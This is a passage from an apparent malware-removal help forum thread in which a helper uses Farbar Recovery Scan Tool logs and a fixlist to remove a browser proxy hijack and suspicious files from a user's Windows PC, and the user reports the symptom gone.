FirewallRules: [{35F5F446-E0E4-4FB4-A3E3-668215BE807C}] => (Allow) C:\Program Files (x86)\HandsFree\Client\Tools\Browser.exe
FirewallRules: [{43FD2C28-07C4-487B-A687-24B5484333D7}] => (Allow) C:\Program Files (x86)\HandsFree\Client\intfr.exe
FirewallRules: [{69ED7FDB-F94D-493C-8C35-A9EAD7B510ED}] => (Allow) C:\Program Files (x86)\HandsFree\Client\dmidecode.exe
FirewallRules: [{186F7A03-E19A-486E-8D87-FB28D2199045}] => (Allow) C:\Program Files (x86)\HandsFree\Client\custicn.exe
FirewallRules: [{0CF98C4C-4E35-4731-853B-02D08E49D714}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cust.exe
FirewallRules: [{AC5C7EC9-D8A8-4472-B2CD-E1FF0E3E142C}] => (Allow) C:\Program Files (x86)\HandsFree\Client\capp.exe
FirewallRules: [{4C4A0BD5-582A-4B59-9E2B-3FEF30269684}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srvc.exe
FirewallRules: [{68691C0D-E59F-46C4-8166-45142B9FE830}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cutil.exe
FirewallRules: [{DD16505B-A2A8-4EB0-8374-B6C127CD1A98}] => (Allow) C:\Program Files (x86)\HandsFree\Client\rerun.exe
FirewallRules: [{FD2400B7-2282-49D3-A08C-6727604F9D2B}] => (Allow) C:\Program Files (x86)\HandsFree\Client\custicn.exe
FirewallRules: [{28E81E42-4896-4602-8E7E-70C018D8384A}] => (Allow) C:\Program Files (x86)\HandsFree\Client\intfr.exe
FirewallRules: [{97A3C09F-C8B2-490F-ACFB-E10580F175F4}] => (Allow) C:\Program Files (x86)\HandsFree\Client\dmidecode.exe
FirewallRules: [{D8915FC4-6A01-4D46-8849-E01D84D68E3D}] => (Allow) C:\Program Files (x86)\HandsFree\Client\Tools\Browser.exe
FirewallRules: [{0CC3AA21-01B3-4EEB-AD3E-68C0FF1F27AD}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srtct.exe
FirewallRules: [{CDED8D2B-5119-4CE0-9A5F-957D8C16FCF4}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srtct.exe
FirewallRules: [{24E4064D-297D-4C0E-AB15-3292987D77CB}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cutil.exe
FirewallRules: [{0B28C5B6-5F32-4B6E-A683-F0D8F0BCA1C5}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cust.exe
FirewallRules: [{85559A6A-F702-44D8-A48D-37A3CE6CB451}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srvc.exe
FirewallRules: [{0843B41D-94F9-40FE-BBC3-9E8B5E7D2C0A}] => (Allow) C:\Program Files (x86)\HandsFree\Client\capp.exe
FirewallRules: [{4CC002EE-2673-48FF-8647-D0A25391EBBE}] => (Allow) C:\Program Files (x86)\HandsFree\Client\rerun.exe
FirewallRules: [{6B2EE850-9968-491A-AE31-D462279C3C31}] => (Allow) C:\Program Files (x86)\HandsFree\Client\Tools\Browser.exe
FirewallRules: [{49AF2DEA-28E2-4190-95D0-5508BFA9D075}] => (Allow) C:\Program Files (x86)\HandsFree\Client\dmidecode.exe
FirewallRules: [{5A0B2834-3592-4291-82E3-B56C71D1D36A}] => (Allow) C:\Program Files (x86)\HandsFree\Client\custicn.exe
FirewallRules: [{56A5964C-D068-44C8-B266-BE224FF00542}] => (Allow) C:\Program Files (x86)\HandsFree\Client\intfr.exe
FirewallRules: [{4A9900B9-4BFC-4F95-ADDA-20AA79052D34}] => (Allow) C:\Program Files (x86)\HandsFree\Client\dmidecode.exe
FirewallRules: [{E23E38B0-9042-4555-9EC3-0FC8920E8520}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srtct.exe
FirewallRules: [{0F496DE0-57F9-48D3-B7C6-96DC4F271DDB}] => (Allow) C:\Program Files (x86)\HandsFree\Client\intfr.exe
FirewallRules: [{FCE7DF8F-4720-4077-8BCE-0EC11A397772}] => (Allow) C:\Program Files (x86)\HandsFree\Client\Tools\Browser.exe
FirewallRules: [{F7BF0682-AA6D-4676-BE0B-35502B81C286}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cutil.exe
FirewallRules: [{1D83FD07-ECC3-4C40-84FD-32C69AFA39F0}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srvc.exe
FirewallRules: [{A3AC9AC2-5FCF-4183-A626-1762AD257477}] => (Allow) C:\Program Files (x86)\HandsFree\Client\custicn.exe
FirewallRules: [{882089C8-DF48-41E6-B367-9483838F1F75}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cust.exe
FirewallRules: [{2ACA4851-A04D-46E5-B3A4-9865FD4516FC}] => (Allow) C:\Program Files (x86)\HandsFree\Client\rerun.exe
FirewallRules: [{14B07EC7-6D5E-48CB-B854-6BB934DCAEB5}] => (Allow) C:\Program Files (x86)\HandsFree\Client\capp.exe
FirewallRules: [{B954F3F4-7C34-480C-9C4A-FEFC48DF3F4C}] => (Allow) LPort=443
FirewallRules: [{7FF32026-3A6A-44CE-9D20-92785562222D}] => (Allow) LPort=443
FirewallRules: [{850068C2-A888-4FEF-97EA-5DD140FE6E45}] => (Allow) LPort=37674
FirewallRules: [{006F0617-B1AB-407C-9D8F-48E79401B08C}] => (Allow) LPort=37674
FirewallRules: [{978761AF-D232-43F1-93DD-BDC601E740CD}] => (Allow) LPort=37675
FirewallRules: [TCP Query User{356EF7AC-1295-445B-8E96-16DF65FC2B32}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [UDP Query User{3EC1271C-6002-436B-BE6B-7D67A58E0BE7}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [{EF30CC4B-E7CD-4C19-8864-844941220A0F}] => (Block) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [{08564573-FC85-4F28-A36B-7EF9AFD14572}] => (Block) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [{B581D952-D1ED-4050-AE44-C3A95E57890A}] => (Allow) C:\Users\dell 2\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{AC35F5D9-25C0-4E87-A000-01F81AA2EDCF}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1544\Agent.exe
FirewallRules: [{A43E1B28-F129-4F6C-8B92-1CAB28983179}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1544\Agent.exe
FirewallRules: [{0241A554-53E1-4CD0-A3A0-854337E79975}] => (Allow) C:\Program Files (x86)\Ventrilo\Ventrilo.exe
FirewallRules: [{3635AD1B-7881-4D72-BEFF-F35BB0AE9633}] => (Allow) C:\Program Files (x86)\Ventrilo\Ventrilo.exe
FirewallRules: [{47791F25-424B-4FF4-9C83-C4BEF7A7B264}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2689\Agent.exe
FirewallRules: [{4E514FDF-604B-44A6-B5D6-A4BCFA73F2AC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2689\Agent.exe
FirewallRules: [{AF240B9D-47FE-441C-9419-AC9ED0329B2B}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{A695D948-09E5-4360-9BBB-9CF569B3DD00}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{EBF5146F-6709-4E1C-9342-DE16D6BE9F72}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe
FirewallRules: [{57CFC2AD-7018-4C2E-B249-C4031308E17B}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe
FirewallRules: [{54D606E5-829F-4F78-A8C5-B2724991668C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2717\Agent.exe
FirewallRules: [{8F23CE5A-2E27-4310-807D-47B0F377A309}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2717\Agent.exe
FirewallRules: [{EEE488E3-9AF6-48F1-8F42-DB7A29254B60}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{B74D992C-928D-44E1-8187-53351220628A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{2DA4E656-4EC5-4C27-8474-E547776FDB4F}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{CB7DF9F6-BB29-4A81-B9A1-EA37BF443196}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{AA0940D6-889B-4E23-B355-0B232F61B8A7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{5A05912B-3D46-4CE8-A47D-8F3D256B6D5F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{408323C1-F8CA-498D-9194-12808928840B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{7403D727-5D8E-4260-9764-49903546CFD5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{F8B7ECE8-744D-4187-B1FC-B8140E8DBCC4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2787\Agent.exe
FirewallRules: [{B4B8096F-3B67-49A2-83FD-792544327A53}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2787\Agent.exe
FirewallRules: [{1AC53FFC-88D4-4162-B5D6-45D601CE94AC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{D8A32B80-5F5F-463C-8823-0212301484CE}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{A89B9C59-4E48-4B88-B854-9E8AA60C799A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{0F89E704-9F21-4D9A-93AF-808C9F83BEC0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{B5DF661A-F970-45F1-921C-BFFEBD6B873C}] => (Allow) C:\Program Files (x86)\Heroes of the Storm\Support\HeroesSwitcher.exe
FirewallRules: [{336E3C4E-2240-48CA-A9F7-86E4AA2A0D5F}] => (Allow) C:\Program Files (x86)\Heroes of the Storm\Support\HeroesSwitcher.exe
FirewallRules: [{BB54CFBA-9CDC-4916-95F7-F9AA7C1EE97B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3023\Agent.exe
FirewallRules: [{8A3F5458-C801-464E-8454-BFB7CEF45DFE}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3023\Agent.exe
FirewallRules: [{A8548BB1-46F4-435E-97D6-B5A6A0B118F7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
FirewallRules: [{DE58110B-3DAD-4532-A1F7-1E6A73B225A6}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
FirewallRules: [{5F252E11-7A4F-4656-AA4D-F9352E6CB678}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
FirewallRules: [{FEE354D0-710A-430A-A48A-1F87534A8E00}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
FirewallRules: [{0E161FBB-EA00-4BE9-B893-904D0C338F1D}] => (Allow) C:\Program Files (x86)\Diablo III\Diablo III.exe
FirewallRules: [{E1465191-8F0A-4251-860A-F6690D49D75F}] => (Allow) C:\Program Files (x86)\Diablo III\Diablo III.exe
FirewallRules: [{AD1F079B-4AA0-453C-8303-1F1F32F6F3F4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
FirewallRules: [{DB0D641B-D05D-4B24-BEDB-128859F903C0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
FirewallRules: [{8444123C-DBFD-4C93-BDFD-22ADD0753D20}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{5F1D35E8-AE8A-4515-8967-49F9D7D58A2D}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{5E6F8012-83D0-48D2-9E25-34BA984DEC8E}] => (Allow) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer.exe
FirewallRules: [{6878FBD7-6B20-4FA3-9462-2655B8681ADD}] => (Allow) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer.exe
FirewallRules: [{5E1DCF3B-F824-4220-B498-67EB9B3936FA}] => (Allow) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe
FirewallRules: [{ABB480BC-B785-4806-BEEE-5CF58AD23290}] => (Allow) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe
FirewallRules: [{407B09C2-3099-4E7E-8656-8F15AC4E6518}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{788337FA-096D-438E-B5E5-26EE335FAEC7}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{D02BBE59-236E-482F-B722-27DDAAF9C8C2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
FirewallRules: [{B20EFA7B-EECB-4CC2-9A1C-BC2D5CDB9BEA}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
FirewallRules: [{B0C961A9-EA7A-4B28-AE50-C21837C94647}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
FirewallRules: [{168BE11E-E9F0-4A40-B678-D3BA7A55704B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
FirewallRules: [{5E2F99FB-7A3A-482E-9251-E341A55DB428}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
FirewallRules: [{DA8CF607-601A-4E93-B194-7B3EB09E16A2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
FirewallRules: [{E6DB926F-D91D-4DFE-929D-419A28295F4F}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3332\Agent.exe
FirewallRules: [{9E60B088-D54C-45E5-9F5F-E407B2A6751A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3332\Agent.exe
FirewallRules: [{CB74F407-8BF9-4B3F-A33E-6361FA568CF3}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
FirewallRules: [{ED7C897A-D036-45E7-AB7C-C497A05B30DF}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
FirewallRules: [TCP Query User{D67C19DB-0499-4473-85B8-19CA62538BFF}C:\programdata\battle.net\agent\agent.3346\agent.exe] => (Allow) C:\programdata\battle.net\agent\agent.3346\agent.exe
FirewallRules: [UDP Query User{CA86FB25-076E-41CF-99B2-8229FF678977}C:\programdata\battle.net\agent\agent.3346\agent.exe] => (Allow) C:\programdata\battle.net\agent\agent.3346\agent.exe
FirewallRules: [{0F123B24-DCB2-45B7-B7CD-D21473941FCD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
FirewallRules: [{E8461A57-E534-4D3B-93CE-59EAF7C635D5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
FirewallRules: [{C0F9F96E-0E8C-45B4-A4F0-3B66D8C85FE1}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Age2HD\Launcher.exe
FirewallRules: [{C4552CFD-AB3F-4785-B442-2A78311BD551}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Age2HD\Launcher.exe
FirewallRules: [{3507CC7E-D5CD-4245-AF82-E9435D2F4AC7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
FirewallRules: [{6B6D5D4A-D47B-40B5-8AB7-A34899A2D462}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
FirewallRules: [{64C7AE70-53F8-4278-BC2F-4309CE728880}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Medieval II Total War\medieval2.exe
FirewallRules: [{528986DF-75CD-4287-AA5A-C5C1CC7F90C5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Medieval II Total War\medieval2.exe
FirewallRules: [{35865838-D827-4111-A81C-C28CFC5E8BCC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3427\Agent.exe
FirewallRules: [{22194AB5-C31B-41E7-93E6-435AF47B4BAB}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3427\Agent.exe
FirewallRules: [{20C442B8-FD67-4C19-B407-CCCD61C52982}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3454\Agent.exe
FirewallRules: [{AB0AFF5B-772F-4E5D-86C2-A9664D528C06}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3454\Agent.exe
FirewallRules: [{DC911188-9986-4B4D-B9E9-4B59F97814C3}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [{DDC46D0D-4A61-47EB-A014-9B409079BD89}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [{77AFBCBF-259E-405F-8F84-AFA6D8AA1802}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3507\Agent.exe
FirewallRules: [{A8DA912D-5AB0-4471-8FD1-8245A28FE491}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3507\Agent.exe
FirewallRules: [{D864F12F-3ADF-4110-935A-4E0A0F4B75C8}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{C595C5F1-F2AB-4A30-AFF9-EBDEDCED5DDD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{91586FBA-C64C-4584-89C7-F52554713A38}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3632\Agent.exe
FirewallRules: [{048D9C1E-406E-4F55-B8D8-11898CB738BF}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3632\Agent.exe
FirewallRules: [{A657B89E-CF70-4AE9-A40A-5B9C1FF4037D}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3634\Agent.exe
FirewallRules: [{550E7323-439F-420E-BADF-F69CAD40A4BD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3634\Agent.exe
FirewallRules: [{A228C47F-5504-4E99-83AE-082357150C95}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3669\Agent.exe
FirewallRules: [{AFEDB7DE-7FAF-47D1-8E59-AF0C4075472D}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3669\Agent.exe
FirewallRules: [{70E0BB3D-0B0E-4511-B2B1-33A1AA840D69}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3688\Agent.exe
FirewallRules: [{C0FEC695-9354-4F2D-B6A1-6FEEAC0208AF}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3688\Agent.exe
FirewallRules: [{5D4882C9-5171-4D0A-AF7B-B00C413877C9}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3689\Agent.exe
FirewallRules: [{9F469E6C-A0C2-4764-9844-DC4D1CF4F2AD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3689\Agent.exe
FirewallRules: [{36A2901B-2EB6-4EC2-804C-33BDC2566208}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3715\Agent.exe
FirewallRules: [{87CBA83F-E293-45FE-B919-17EF09DFAFE1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3715\Agent.exe
FirewallRules: [{4C418442-4F5C-4AF7-807A-50C5BE944698}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{E44A130D-AED8-4976-A3C1-571A4BFB6640}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Faulty Device Manager Devices =============
 
Name: Dell Wireless 375 Bluetooth Module
Description: Dell Wireless 375 Bluetooth Module
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Broadcom
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (06/08/2015 04:29:50 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Stream product id=0x0066): Streaming Failed
 
Error: (06/08/2015 04:29:15 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
Too many failures while downloading ranges: 2
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Cache Bytes
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Process\ID Process
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Page Faults/sec
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Pool Nonpaged Bytes
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Pool Paged Bytes
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Committed Bytes
 
Error: (06/08/2015 04:22:17 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:17.719-04:00| vthread-4| E105: Failed to read registry perf object Memory\Cache Bytes
 
Error: (06/08/2015 04:22:17 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:17.719-04:00| vthread-4| E105: Failed to read registry perf object Process\ID Process
 
 
System errors:
=============
Error: (06/08/2015 04:26:28 AM) (Source: WMPNetworkSvc) (EventID: 14332) (User: )
Description: Service 'WMPNetworkSvc' did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error '0x80004005'. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.
 
Error: (06/08/2015 04:25:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Trend Micro Client/Server Security Agent service failed to start due to the following error: 
%%1053
 
Error: (06/08/2015 04:25:42 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Trend Micro Client/Server Security Agent service to connect.
 
Error: (06/08/2015 04:24:38 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The HandsFree Client service failed to start due to the following error: 
%%2
 
Error: (06/08/2015 04:24:22 AM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: This computer is configured as a member of a workgroup, not as
a member of a domain. The Netlogon service does not need to run in this
configuration.
 
Error: (06/08/2015 04:24:20 AM) (Source: Microsoft-Windows-TaskScheduler) (EventID: 413) (User: NT AUTHORITY)
Description: Task Scheduler service failed to load tasks at service startup. Additional Data: Error Value: 2147942402.
 
Error: (06/08/2015 04:24:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NTRU TSS v1.2.1.34 TCS service depends on the TPM Base Services service which failed to start because of the following error: 
%%0
 
Error: (06/08/2015 04:16:21 AM) (Source: WMPNetworkSvc) (EventID: 14332) (User: )
Description: Service 'WMPNetworkSvc' did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error '0x80070420'. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.
 
Error: (06/08/2015 04:13:50 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The HandsFree Client service failed to start due to the following error: 
%%2
 
Error: (06/08/2015 04:13:40 AM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: This computer is configured as a member of a workgroup, not as
a member of a domain. The Netlogon service does not need to run in this
configuration.
 
 
Microsoft Office:
=========================
Error: (06/08/2015 04:29:50 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: (Stream product id=0x0066): Streaming Failed
 
Error: (06/08/2015 04:29:15 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Too many failures while downloading ranges: 2
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Cache Bytes
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Process\ID Process
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Page Faults/sec
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Pool Nonpaged Bytes
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Pool Paged Bytes
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Committed Bytes
 
Error: (06/08/2015 04:22:17 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:17.719-04:00| vthread-4| E105: Failed to read registry perf object Memory\Cache Bytes
 
Error: (06/08/2015 04:22:17 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:17.719-04:00| vthread-4| E105: Failed to read registry perf object Process\ID Process
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-2520M CPU @ 2.50GHz
Percentage of memory in use: 67%
Total physical RAM: 3992.93 MB
Available physical RAM: 1279.81 MB
Total Pagefile: 7984.07 MB
Available Pagefile: 4403.53 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:450.57 GB) (Free:145 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 18914F7C)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=15.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450.6 GB) - (Type=07 NTFS)
 
==================== End of log ============================


#4 B-boy/StyLe/


    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • Gender:Male
  • Location:Bulgaria
  • Local time:09:00 AM

Posted 08 June 2015 - 12:51 PM

Hi,
 
 
Please download the following file => [attachment=165827:fixlist.txt] and save it to the Desktop.
NOTE: It's important that both files, FRST and fixlist.txt, are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

Let me know how things are after the fix above.
 
 
Regards,
Georgi




#5 Mohasaiyan

  • Topic Starter

  • Members
  • 10 posts
  • Local time:02:00 AM

Posted 08 June 2015 - 03:52 PM

Dude, the most difficult symptom seems to have been removed, man, thanks a lot. Chrome would not allow me to change my proxy settings even though I had managed to do that on Windows. Chrome kept telling me that proxy settings are enforced by admin even though I am the admin on this cpu. Now there is no trace of that symptom of the virus. I cannot thank you enough. Here is the requested log. I am going to run a scan with adware cleaner and Norton and will update you after that. I dunno if we are done here, but either way I cannot thank you enough.

 

Fix result of Farbar Recovery Scan Tool (x64) Version:07-06-2015
Ran by dell 2 at 2015-06-08 16:32:12 Run:1
Running from C:\Users\dell 2\Downloads
Loaded Profiles: dell 2 & MSSQL$SQLEXPRESS (Available Profiles: dell 2 & MSSQL$SQLEXPRESS & Classic .NET AppPool & localhost & DefaultAppPool)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [.DEFAULT] => http=127.0.0.1:55783;https=127.0.0.1:55783
2015-06-07 03:52 - 2015-06-07 04:23 - 06103040 _____ C:\Program Files (x86)\GUT9627.tmp
2015-06-07 03:52 - 2015-06-07 03:52 - 00000000 ____D C:\Program Files (x86)\GUM9626.tmp
2015-06-06 02:40 - 2015-06-06 02:40 - 00000000 __SHD C:\found.000
File: C:\Windows\system32\ysxja.exe
File: C:\Windows\cygavb.exe
File: C:\Windows\FiddlerCore4.dll
